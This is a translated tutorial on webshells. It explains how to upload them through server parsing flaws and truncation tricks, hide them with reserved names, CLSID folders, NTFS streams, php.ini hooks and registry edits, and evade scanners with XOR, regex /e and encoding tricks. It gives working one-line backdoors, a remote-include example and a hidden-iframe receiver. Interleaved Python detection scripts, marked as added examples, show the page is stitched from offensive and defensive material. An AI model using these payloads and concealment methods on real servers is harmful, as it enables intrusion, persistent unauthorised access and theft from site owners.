Webshell implementation and hiding

Source: Internet
Author: User
Tags: open source cms

I. What is a webshell

Webshell introduction: as the name suggests, "web" refers to the web server and "shell" is a script program written in a scripting language. A webshell is a web management tool that carries the permission to operate on the web server; it is also known as webadmin. Webshells are generally used by website administrators for website management, server management and similar purposes. However, because a webshell is so powerful (it can upload and download files and view databases, and on some servers it can even call system commands such as creating users or modifying and deleting files), these functions are also used by hackers: they upload their own webshell into the directory of the web server's pages and then intrude into the web server by accessing that page, or they insert a one-sentence Trojan and connect to it from the local machine to intrude into the server directly.

Webshell classification: webshell scripts can be divided into PHP script Trojans, ASP script Trojans, .NET-based script Trojans and JSP script Trojans. Abroad there are also dynamic web pages written in the Python scripting language, and of course matching webshells exist for them. By function they are divided into the big Trojan ("dama") and the small Trojan ("pony"). The pony generally refers to the one-sentence Trojan, for example <% eval request("pass") %>. Usually this sentence is written into a document, the file is renamed to xx.asp, and it is then uploaded to the server. Here eval converts request("pass") into code and executes it, and request takes in the external input. This is equivalent to the client side of the Trojan. The server side (local configuration):

<form action=http://host/path/TEXT.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")    ' create a Stream object
lP.open                                       ' open it
lP.type=2                                     ' text mode
lP.charSet="gb2312"                           ' character set
lP.writetext request("newvalue")
lP.saveToFile server.mappath("newmm.asp"),2   ' write the Trojan content to newmm.asp; 2 means overwrite
lP.close                                      ' close the object
set lP=nothing                                ' release the object
response.redirect "newmm.asp"                 ' switch to newmm.asp
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45>(paste the content of the generated Trojan here)</textarea>
<br><center><br><input type=submit value=submit>

Here the Trojan is submitted through the form. Specifically, an object lP is defined, the content of newvalue (defined in the textarea) is written in text mode so that it overwrites the ASP file, and that script is then executed. The value in the client is the form field name; it must match the field name in the POST submitted by the server (local machine). The value can therefore be any string and is equivalent to a password, but this "password" is in plain text and can be intercepted. The PHP one-sentence Trojan works on the same principle; only the language differs, and with it the syntax. That is the basic working principle of the pony.

The big Trojan works much more simply: there is no distinction between client and server. Some script experts directly integrate the server side with the one-sentence Trojan; the big Trojan is uploaded through an upload vulnerability, its URL is then opened directly on the web server, and penetration is carried out from that page. However, some websites impose strict restrictions on file upload. Because the big Trojan has many functions it is relatively large and may exceed the website's upload limit, whereas the size of the pony can be controlled (for example the code can be copied many times, or inserted into a garbled file); on the other hand the pony is cumbersome to operate. So the pony is uploaded first to obtain a webshell, and the big Trojan is then uploaded to the server through the pony connection.

II. How to upload a webshell

1. Upload via parsing vulnerabilities. Different web server systems run different web server programs: IIS on Windows and Nginx on Linux. These services are a great help in building web servers, but they also bring potential risks: they have vulnerabilities that hackers can exploit easily.
(1) IIS directory parsing vulnerability, for example /xx.asp/xx.jpg: although a JPG file is uploaded, if it sits under a folder named xx.asp, IIS treats the image file as xx.asp and parses it. This vulnerability exists in IIS 5.x/6.0.
(2) File parsing vulnerability: xx.asp;.jpg. At upload time the web page identifies it as a jpg file, but IIS does not parse what follows the ';' and parses the file as asp. This vulnerability exists in IIS 5.x/6.0.
(3) File name parsing, for example xx.cer / xx.cdx / xx.asa. In IIS 6.0, cer, cdx and asa files are all treated as executable, and asp code inside them is executed. (asa is a configuration file specific to asp, and cer is the certificate file.)
(4) When fast-cgi is enabled on the web server, upload an image xx.jpg with the content:
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[shell])?>'); ?>
fputs creates the file shell.php and writes the one-sentence Trojan into it. Accessing xx.jpg/.php generates the Trojan shell.php in that path. This vulnerability exists in IIS 7.0/7.5 and Nginx 8.03 or earlier. Language environments: PHP, Perl, Bourne shell, C and others. Note: fast-CGI is an upgraded version of CGI. CGI is the interface that provides human-computer interaction on the server; fast-CGI is a resident CGI. Each CGI execution needs fork to start a process, while fast-CGI keeps running once activated and does not fork a process for each request, so it uses less memory than ordinary CGI.
(5) Apache parsing vulnerability. Because Apache cannot parse rar it parses the file as php, while the back-end upload point treats it as rar; in this way the file suffix restriction is bypassed.

2. Null-byte truncation. When uploading an image such as "1.asp .jpg" (with a space after asp), capture the form during the upload with NC or Burp Suite and change the space after asp to %00.
(You can edit the HEX value directly in Burp Suite: the HEX value of a space is 20; change 20 to 00.) HEX 00 means truncation and 20 means a space. With truncation, the JPG verification statement in the script is ignored and the ASP file is uploaded directly.

3. Back-end database backup. Some enterprise back-end management systems have a database backup function (for example the southern CMS has one). Upload an image that contains a Trojan, or change the Trojan's extension to jpg, then use the database backup function to back up this image as asp or another format that is parsed as script, and run the Trojan through web access. This method is very old; most CMSs have removed or disabled the backup function.

4. Upload using database statements.
(1) MySQL into outfile. The preconditions are that the website has an injection point, that the current user has the upload permission, and that the absolute path of the current web page on the server is known. A union query is used to write the Trojan into a PHP file under the website, and the Trojan is then connected to through the server. These conditions are harsh and rarely met.
(2) Create a new table and write the Trojan. Some open-source CMSs or self-made webshells have a database management function that includes an SQL query function. First run create table shell (code text); to create a table named shell with a column code of type text. Then run insert into shell (code) values ('one-sentence Trojan'); so that the code column of the shell table holds the one-sentence Trojan, and then use custom backup to back up the table to x.php;x, which is parsed as php and executed. It is not only x.php;x that can be parsed as php.
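The upload tricks above all leave traces in the web root: script-named directories, ';' or a trailing space inside a file name, the alternate IIS 6 extensions, and script openers inside files that claim to be images. The following audit script is an added example (not code from the page); it builds a constructed sample tree in a temporary directory and reports every file matching one of those patterns.

```python
import os
import re
import tempfile

# Extensions IIS/PHP execute, and the image extensions an upload filter usually allows
SCRIPT_EXT = {".asp", ".asa", ".cer", ".cdx", ".php", ".aspx", ".jsp"}
IMAGE_EXT = {".jpg", ".jpeg", ".gif", ".png"}
# Script openers that have no business inside an image file
SCRIPT_TAG = re.compile(rb"<\?php|<%|<script[^>]*runat\s*=\s*[\"']?server", re.I)


def ext_of(name):
    return os.path.splitext(name)[1].lower()


def audit_path(rel_path):
    """Findings derived from the path alone, one per parsing trick described above."""
    findings = []
    parts = rel_path.replace("\\", "/").split("/")
    name = parts[-1]
    # xx.asp/xx.jpg: IIS 5.x/6.0 executes anything stored under a script-named directory
    if any(ext_of(d) in SCRIPT_EXT for d in parts[:-1]):
        findings.append(("script-named directory", rel_path))
    # xx.asp;.jpg and x.php;x: IIS 6.0 stops reading the file name at ';'
    if ";" in name and ext_of(name.split(";", 1)[0]) in SCRIPT_EXT:
        findings.append(("semicolon truncation", rel_path))
    # '1.asp .jpg' / '1.asp\x00.jpg': a space or NUL parked before the image extension
    if "\x00" in name or re.search(r"\.(asp|php)\s+\.", name, re.I):
        findings.append(("space/null truncation", rel_path))
    # xx.cer / xx.cdx / xx.asa are executed by IIS 6.0 but rarely uploaded legitimately
    if ext_of(name) in {".cer", ".cdx", ".asa"}:
        findings.append(("iis6 alternate script extension", rel_path))
    return findings


def audit_bytes(rel_path, data):
    """Findings that need the content: a script opener inside a file claiming to be an image."""
    if ext_of(rel_path.rsplit("/", 1)[-1]) in IMAGE_EXT and SCRIPT_TAG.search(data):
        return [("script code inside image", rel_path)]
    return []


def audit_webroot(root):
    """Walk a web root and return sorted (reason, relative path) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings.extend(audit_path(rel))
            with open(full, "rb") as fh:
                findings.extend(audit_bytes(rel, fh.read(64 * 1024)))
    return sorted(findings)


def build_sample_webroot():
    """Constructed sample tree reproducing the upload tricks described above (not real data)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        "img/logo.jpg": b"\xff\xd8\xff\xe0 plain jpeg bytes",
        "index.php": b"<?php echo 'home'; ?>",
        "up/xx.asp/xx.jpg": b'<% eval request("pass") %>',
        "up/xx.asp;.jpg": b'<% eval request("pass") %>',
        "up/1.asp .jpg": b"GIF89a",
        "up/xx.cer": b'<% eval request("pass") %>',
        "up/xx.jpg": b"<?php fputs(fopen('shell.php','w'),'...'); ?>",
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for reason, path in audit_webroot(build_sample_webroot()):
        print(f"{reason:32} {path}")
```

Run it against a real document root by passing that path to audit_webroot instead of the constructed tree; a file-name match alone is enough to justify pulling the file for review.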
Different web servers have different service programs and filter rules, so other methods can be used.
(3) phpMyAdmin configuration error. phpMyAdmin is a tool for managing website databases, and config.inc.php is its configuration file. When you view that file, if $cfg['Servers'][$i]['auth_type'] is not set (the default is config), no verification is performed when logging in to the database and you can connect directly. In MySQL the root user (the administrator) is used to log in by default, so the login has maximum privileges. However, root can only log in locally, so a user that may log in remotely must be created. After logging in remotely as that user, create a table and write the one-sentence Trojan.

III. "Security" of the webshell

1. Hiding. The webshell must be hidden after it is uploaded. The first goal of hiding is to prevent the website administrator from deleting the Trojan; the second is to avoid being discovered and used by other hackers.

(1) Hiding the Trojan
① Folder names reserved by the system. On the compromised Windows system certain names cannot be used to name files or folders: aux, prn, con, nul, com1 to com9 and lpt1 to lpt9. However, they can be created with the Windows copy command, for example:
c:\>copy 3.asp \\.\C:\aux.asp
This creates aux.asp on drive C. The file cannot be deleted from the graphical interface; the del command must be used to delete it.
After deletion there is no prompt, but the file no longer exists. This method can of course create a webshell that cannot be deleted from the GUI; however, if the webshell is placed directly in the web root, an experienced administrator will still delete it.
② CLSID hiding. Every Windows program has a CLSID. Name a folder x.{program CLSID} and create it with the two commands shown; clicking it opens the control panel, but it is still a folder, and the Trojan is inside it. Creating a folder with a CLSID and naming it after the corresponding program confuses the administrator. For example, create a folder with the recycle bin CLSID inside the recycle bin folder, copy a reserved-name asp file into it, and use attrib +h +s +r +d /s /d to modify the file attributes and hide it. Hidden files are not displayed in Windows by default, and the recycle bin folder is created automatically, so an undeletable webshell is hidden on the server.
③ Driver hiding. The principle is that in the Windows file system, when a folder is opened, the system sends IRP_MJ_DIRECTORY_CONTROL, which allocates a buffer and stores the information obtained by traversing the subfolders into it. During the traversal it looks for a matching file name; if the name matches, the current folder or file is skipped. As for the bypass principle, I looked at the code; my understanding is that when the traversal pointer reaches the target file, its offset is used to skip the target folder without scanning it.
Although there is a lot of C source code for this technique on the Internet, it is difficult to operate because of header-file and system support (file systems differ between systems). Instead, find the Easy File Locker program on the Internet, install it on the web server and set permissions on the target file. The permission settings are accessible, writable, deletable and visible. After this the file is hidden. As mentioned above, because the traversal is bypassed directly, the file can still be accessed by its absolute path. My understanding is that the four files c:\WINDOWS\xlkfs.dat, c:\WINDOWS\xlkfs.dll, c:\WINDOWS\xlkfs.ini and c:\WINDOWS\system32\drivers\xlkfs.sys replace the traversal query: accessing a hidden file by its absolute path is not an ordinary path lookup by the application but goes through these four files, which amount to a separate driver for the hidden files. So as not to be discovered by the administrator, the Easy File Locker program can be deleted, but not these four files; after the program is deleted the hidden backdoor can still be reached by entering its absolute path.
④ Registry hiding. The registry path HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL contains a CheckedValue; change it to 0 (if there is no CheckedValue, create the key directly and set it to 0). The hidden files are then completely hidden, and "Show all files" in the folder options no longer shows them.

(2) Hiding the one-sentence Trojan
① Header file include. Some script files on the web contain include statements, which can be used to include the one-sentence file; the include is executed directly when the page is accessed.
ASP statement: <!--#include file="file path"-->. Enter the path directly; the path is on the web server. The pony can be written into an image as an NTFS stream, changing the '\' in the path to ':'. The image cannot be displayed after it is written. Find an asp file on the web server and write the include statement at the beginning of the file: <!--#include file="inc:1.jpg"-->. File inclusion parses the NTFS stream as asp; after inclusion, the asp file we access contains the one-sentence Trojan, so the one-sentence Trojan is hidden.
PHP statement: <?php include($include); ?>. $include can be an external path, for example http://www.aaa.com/1.php?include=http://www.bbb.com/hehe.php, where the content of 1.php on aaa is <?php include($include); ?>. bbb is an external server; the precondition is that bbb does not support PHP, otherwise hehe.php (the one-sentence Trojan) is executed on the bbb server and not on aaa.
② Configuration file hiding (PHP). After obtaining a PHP webshell, php.ini can be used to hide the file by editing the configuration. One of its items adds the content of a file to the header and footer of every page: auto_prepend_file = hehe.php. Then look at include_path = "E:\PHPnow-1.5.6\htdocs;", which indicates where the header and footer are loaded from; the path rule is ".\path1;\path2": the header and footer file under path1 is added to the files in that path, and because '.' means the root path it is added to the home page. Put the one-sentence Trojan in hehe.php, and it is thereby written into the website's home page.
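Each hiding technique above (reserved device names, CLSID-suffixed folders, an include pointing at an NTFS stream, a variable passed to include(), and auto_prepend_file in php.ini) can be checked for from a file listing and the relevant configuration text. The checks below are an added example written for this page, not code from it; the paths, php.ini fragment and script snippets are constructed samples modelled on the page's own examples, and the recycle bin CLSID is the well-known {645FF040-5081-101B-9F08-00AA002F954E}.

```python
import re

# Device names Windows Explorer cannot delete; copy \\.\C:\aux.asp can still create them
RESERVED = {"con", "prn", "aux", "nul"} | {f"com{i}" for i in range(1, 10)} | {f"lpt{i}" for i in range(1, 10)}
# A folder named x.{CLSID} is shown by Explorer as the matching shell object, not as a folder
CLSID_DIR = re.compile(r"\.\{[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}$", re.I)
# php.ini directives that splice a file into every page served
PHP_INI_HOOK = re.compile(r"^\s*(auto_prepend_file|auto_append_file)\s*=\s*\"?([^\"\n;]+)", re.I | re.M)
# <!--#include file="inc:1.jpg"-->: a colon inside the name points at an NTFS alternate stream
ASP_INCLUDE = re.compile(r"<!--\s*#include\s+(?:file|virtual)\s*=\s*\"([^\"]+)\"\s*-->", re.I)
# include/require whose argument is a variable, as in include($include)
PHP_DYN_INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$", re.I)


def suspicious_path(path):
    """Reasons a Windows path matches the hiding tricks above (reserved name, CLSID folder)."""
    reasons = []
    for part in (p for p in re.split(r"[\\/]", path) if p):
        if part.split(".", 1)[0].lower() in RESERVED:
            reasons.append(f"reserved device name: {part}")
        if CLSID_DIR.search(part):
            reasons.append(f"CLSID-suffixed folder: {part}")
    return reasons


def php_ini_hooks(ini_text):
    """(directive, file) pairs for auto_prepend/append_file; any value set deserves review."""
    return [(m.group(1).lower(), m.group(2).strip()) for m in PHP_INI_HOOK.finditer(ini_text)]


def ads_includes(asp_source):
    """Include targets that name an NTFS alternate data stream (file:stream)."""
    hits = []
    for m in ASP_INCLUDE.finditer(asp_source):
        target = m.group(1)
        without_drive = re.sub(r"^[a-zA-Z]:", "", target)  # C:\x is a drive letter, not a stream
        if ":" in without_drive:
            hits.append(target)
    return hits


def dynamic_php_includes(php_source):
    """Number of include/require calls taking a variable instead of a literal path."""
    return len(PHP_DYN_INCLUDE.findall(php_source))


# Constructed samples modelled on the page's examples (not data from a real host)
SAMPLE_PATHS = [
    r"C:\inetpub\wwwroot\index.asp",
    r"C:\aux.asp",
    r"C:\inetpub\wwwroot\img\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\com1.asp",
]
SAMPLE_PHP_INI = "; constructed php.ini fragment\nauto_prepend_file = hehe.php\ninclude_path = \".;E:\\PHPnow-1.5.6\\htdocs\"\n"
SAMPLE_ASP = '<!--#include file="header.asp"-->\n<!--#include file="inc:1.jpg"-->\n<% Response.Write "hi" %>'
SAMPLE_PHP = "<?php include($include); ?>"

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(p, suspicious_path(p))
    print(php_ini_hooks(SAMPLE_PHP_INI), ads_includes(SAMPLE_ASP), dynamic_php_includes(SAMPLE_PHP))
```

On a live host, feed suspicious_path the output of a recursive directory listing taken with "dir /a" (which lists hidden and system files), since the page's attrib and SHOWALL tricks hide the entries from Explorer.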
③ 404 pony. When the 404 pony is visited, a "page does not exist" 404 page is shown, but the Trojan code has actually been executed. Generally it can be invoked by pressing shift five times.

IV. Webshell kill-free (scanner evasion)

One-sentence kill-free
1. Constructor bypass (PHP). Detection programs generally filter strings such as "_POST", "system" and "call_user_func_array"; in this case a constructor can be used to bypass some detection programs. The basic principle is that every character in PHP corresponds to a binary value, so by exclusive-or a character in the Trojan can be replaced by two other values whose XOR gives it. For example:
<?php
@$_++;          // ++ adds 1 to the undefined $_, so $_ is 1
$__=("#"^"|");  // _
$__.=("."^"~"); // P
$__.=("/"^"`"); // O
$__.=("|"^"/"); // S
$__.=("{"^"/"); // T
?>
Then the constructor and the one-sentence Trojan can be written as:
<?php @$_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); // the value of $__ is _POST
${$__}[!$_](${$__}[$_]); ?> // the result is @$_POST[0]($_POST[1])
!$_ is the negation of 1; in the language 1 means true, and its negation is 0 (false). However, this bypass method is quite weak. Think about it: even though the binary values of two characters are XORed, a specific character must still be used to produce the value of the target character. For example, the binary value of $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/") is the same as the value of the string _POST, so if the detection program checks the value of the binary code, it will still be killed.
2. Regular expression replacement (PHP). PHP has the function preg_replace(), which performs regular-expression replacement. Using replacement to bypass the detection system also relies on a feature of PHP: when a function is called, if the value of the parameter contains a command, the system executes the command.
<?php function funfunc($str){} echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]); ?>
The code above is the replacement process. First create an empty function, then use preg_replace to replace <title></title> (in HTML) in the cmd form value with funfunc. Write the value in the POST form as <title>{${phpinfo()}}</title> (of course phpinfo() can be replaced with other commands); it becomes funfunc({${phpinfo()}}), and because ${} evaluates the content in {}, phpinfo here executes smoothly.
3. Instant generation (PHP). The header-file include is easily scanned by scanners. In that case file_put_contents can be used to create a file and write the PHP one-sentence Trojan into it.
The Trojan is generated just before it is accessed; but this function is sensitive and is easily killed.
4. Avoidance method (ASP). Because some ASP servers filter <% and %> to prevent the one-sentence Trojan, you can use <script language=VBScript runat=server>execute request("cmd")</script>, which has the same function. Avoiding a specific scripting language: the aspx one-sentence Trojan <script language="C#" runat="server">WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");</script> is written in C#.
5. ASP split. Split <% eval request("x") %> into <% Y=request("x") %><% eval(Y) %>. Although the chance of bypassing is very small, it is also a bypass method: some servers have done a lot of scanning for the big things but miss minor ones. Enhanced split method: <% If Request("MH")<>"" Then Execute(Request("MH")) %> and <% if request("MH")<>"" then session("MH")=request("MH"): end if: if session("MH")<>"" then execute session("MH") %>. The two sentences above use if to separate them. The central idea is to split the sensitive characters, because the ASP signature is usually eval(request or execute(request; if no signature is detected after splitting, it is bypassed directly.
6. Garbled deformation (ANSI -> Unicode encryption). <% eval request("#") %> is changed to <% eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116)("brute")) %>. This line of code uses ASCII encoding: chr(114) is the 114th ASCII character, i.e. r. The converted code is <% eval(request("brute")) %>.
7. Kill-free big Trojan
(1) base64-encoded big Trojan. Compress the big Trojan's code, then apply the base64 encoding, and add @eval(gzinflate(base64_decode($code))) at the end of the Trojan to execute the script. Here the $code variable holds the base64 code; on execution gzinflate decompresses it and eval executes it.
In fact this is not really kill-free: base64 and eval are still among the signatures and will also be killed when a scanner is used.
(2) ROT13 encoding (PHP). str_rot13 is an encoding function in PHP; it can be used to encode the script code to bypass signature detection, as in the example shown in the figure. The strrev function reverses the characters, and to escape signature detection the characters are separated with the '.' sign. In the figure, the three strings encrypted by str_rot13 are gzinflate, str_rot13 and base64_decode, which is equivalent to triple encryption and avoids the gzinflate and base64_decode signatures. However, str_rot13 itself is not avoided; some programs use str_rot13 as a signature. ROT13 rotates by 13: the current character's position in the alphabet is shifted by 13 to obtain the encrypted character, and encrypting twice returns the original value. Because the algorithm is fixed the encryption strength is not high, and cracking is extremely simple: just encrypt it again.
(3) Other encodings. When the big Trojan or the one-sentence Trojan is killed, PHP or ASP encryption functions (such as base64 and rot13) are generally used to encrypt it and bypass scanners, but I think you can write the encryption algorithm yourself and then use your own algorithm to encrypt the script code to bypass some signatures. Use encryption methods such as the Caesar cipher and shift encryption to write an algorithm and encrypt the script code, and the base64 and rot13 patterns disappear; alternatively, encrypt only the signatures with the home-made algorithm and decrypt them when used. Keyed encryption algorithms such as DES and RSA can also be used.
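As the text observes, a scanner that evaluates the XOR'd literals still sees _POST, and eval fed by gzinflate/base64_decode/str_rot13 remains a signature. The checker below is an added example for this page (not code from it): it folds chains of "a"^"b" literals into the string they produce before matching, then looks for the decoder-into-eval chain, the preg_replace /e modifier and request data used as a function name. The four sample scripts are constructed from the snippets discussed above.

```python
import re

# One ("a"^"b") literal, and a chain of them joined with '.', as in the constructor above
XOR_PAIR = re.compile(r'\(\s*"(.)"\s*\^\s*"(.)"\s*\)')
XOR_CHAIN = re.compile(r'\(\s*"."\s*\^\s*"."\s*\)(?:\s*\.\s*\(\s*"."\s*\^\s*"."\s*\))*')
# eval() fed by a decoder/decompressor, as in @eval(gzinflate(base64_decode($code)))
EVAL_DECODER = re.compile(r"\beval\s*\(\s*(gzinflate|gzuncompress|base64_decode|str_rot13|strrev)\s*\(", re.I)
# First argument of preg_replace; the modifiers after the closing delimiter are checked for 'e'
PREG_CALL = re.compile(r"preg_replace\s*\(\s*(['\"])(.*?)\1", re.S)
# ${$var}[...](...) or $_POST[...](...): request data used as a function name
VAR_FUNC = re.compile(r"(?:\$\{\s*\$\w+\s*\}|\$_(?:POST|GET|REQUEST|COOKIE))\s*\[[^\]]*\]\s*\(")
SUPERGLOBALS = ("_POST", "_GET", "_REQUEST", "_COOKIE")


def resolve_xor(src):
    """Replace every chain of "a"^"b" literals with the string it evaluates to."""
    def fold(m):
        pairs = XOR_PAIR.findall(m.group(0))
        return '"' + "".join(chr(ord(a) ^ ord(b)) for a, b in pairs) + '"'
    return XOR_CHAIN.sub(fold, src)


def preg_replace_with_e(src):
    """True if any preg_replace pattern carries the /e modifier (code execution)."""
    for m in PREG_CALL.finditer(src):
        pattern = m.group(2)
        if len(pattern) >= 2:
            modifiers = pattern[pattern.rfind(pattern[0]) + 1:]  # text after closing delimiter
            if "e" in modifiers.lower():
                return True
    return False


def scan_php(src):
    """Reasons a PHP source looks like an obfuscated one-sentence Trojan; [] if clean."""
    resolved = resolve_xor(src)
    reasons = []
    for name in SUPERGLOBALS:
        if name in resolved and name not in src:
            reasons.append(f"XOR-obfuscated superglobal name: {name}")
    m = EVAL_DECODER.search(resolved)
    if m:
        reasons.append(f"eval of decoded payload: {m.group(1).lower()}")
    if preg_replace_with_e(resolved):
        reasons.append("preg_replace with /e modifier")
    if VAR_FUNC.search(resolved):
        reasons.append("variable function call on request data")
    return reasons


# Constructed samples built from the snippets discussed above (not files from a real server)
SAMPLE_XOR = '<?php @$_++; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); ${$__}[!$_](${$__}[$_]); ?>'
SAMPLE_PREG = r'''<?php function funfunc($str){} echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]); ?>'''
SAMPLE_B64 = '<?php $code="...base64 placeholder..."; @eval(gzinflate(base64_decode($code))); ?>'
SAMPLE_CLEAN = '<?php echo htmlspecialchars($_GET["q"]); ?>'

if __name__ == "__main__":
    for label, src in [("xor", SAMPLE_XOR), ("preg", SAMPLE_PREG), ("b64", SAMPLE_B64), ("clean", SAMPLE_CLEAN)]:
        print(label, scan_php(src))
```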
Generally the big Trojan has a password login box. The login password can be linked with the decryption key, so that the code is decrypted only after the correct password is entered. On the one hand, this Trojan cannot be decrypted even if someone else obtains it, which avoids scanners and killing software; on the other hand, it cannot be decrypted to read the source code.

V. Webshell backdoors

Big Trojans downloaded from the Internet generally have backdoors. These directly cause the websites we use to be taken over by others, so a Trojan downloaded from the Internet must first be checked for backdoors. For example, the universal password here:
end function
if session("hehe")<>userpass then
  if request.form("pass")<>"" then
    if request.form("pass")=userpass or request.form("pass")="1111111" Then
      session("hehe")=userpass
      response.redirect url
    else

request.form("pass")=userpass originally verifies the pass value: if the entered pass equals userpass, verification succeeds. But the following or request.form("pass")="1111111" means that entering 1111111 as pass also logs into the Trojan. Of course it is not always this simple. The original author could assign two values to userpass and add a trigger condition that changes userpass, fired when a user logs in (for example, the userpass value is updated after a failed login); a backdoor can be added this way, and because the code of the trigger condition is separated from the verification code it is difficult to find. In that case the Trojan code must be analysed line by line. The Trojan is then mounted with a frame: <iframe src=backdoor address width=0 height=0></iframe>; with the link's width and height set to 0, the page is hidden. The backdoor address points to the receiving script, which is finally placed on a self-built public network server. The receiving script is as follows:
<%
url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>

url=Request.ServerVariables("HTTP_Referer") reads the Referer from the request, that is, the URL the visitor came from, and then saves that URL to hehe.txt in the current directory. To remove such a backdoor, first break the Trojan's second verification password, the universal password, by deleting the relevant code; then check whether the ASP Trojan page contains a hidden URL such as width=0 height=0, find it and delete it.
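The two checks the text prescribes for a downloaded big Trojan, a second hard-coded password in the login comparison and a zero-size iframe that leaks the shell's URL through the Referer, can be automated. The script below is an added example (not code from the page); its sample is constructed from the login fragment and iframe shown above, with backdoor.invalid as a placeholder address.

```python
import re

# request.form("pass")=<rhs>: the rhs is either the configured variable or a literal string
PASS_COMPARE = re.compile(r'request\.form\s*\(\s*"(\w+)"\s*\)\s*=\s*("[^"]*"|\w+)', re.I)
# Any iframe tag; a width and height of 0 hide it from the page
IFRAME = re.compile(r'<iframe\b[^>]*>', re.I)
IFRAME_SRC = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
ZERO_DIM = re.compile(r'\b(width|height)\s*=\s*["\']?0\b', re.I)


def literal_password_compares(asp_source):
    """(field, literal) pairs where a request field is compared with a hard-coded string."""
    hits = []
    for m in PASS_COMPARE.finditer(asp_source):
        field, rhs = m.group(1), m.group(2)
        if rhs.startswith('"'):  # comparison against a variable such as userpass is expected
            hits.append((field, rhs.strip('"')))
    return hits


def hidden_iframes(html_source):
    """src of every iframe whose width and height are both 0."""
    hits = []
    for m in IFRAME.finditer(html_source):
        tag = m.group(0)
        dims = {d.lower() for d in ZERO_DIM.findall(tag)}
        src = IFRAME_SRC.search(tag)
        if dims == {"width", "height"} and src:
            hits.append(src.group(1))
    return hits


def audit_downloaded_shell(asp_source):
    """Backdoor indicators in a downloaded ASP big Trojan, combining both checks."""
    return {
        "universal_passwords": literal_password_compares(asp_source),
        "hidden_iframes": hidden_iframes(asp_source),
    }


# Constructed sample assembled from the login fragment and iframe discussed above
SAMPLE_SHELL = '''end function
if session("hehe")<>userpass then
  if request.form("pass")<>"" then
    if request.form("pass")=userpass or request.form("pass")="1111111" Then
      session("hehe")=userpass
      response.redirect url
    else
<iframe src=http://backdoor.invalid/rec.asp width=0 height=0></iframe>
'''

if __name__ == "__main__":
    print(audit_downloaded_shell(SAMPLE_SHELL))
```

A clean result does not clear the file: as the text notes, a trigger that rewrites userpass elsewhere in the code is only found by reading the script line by line.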
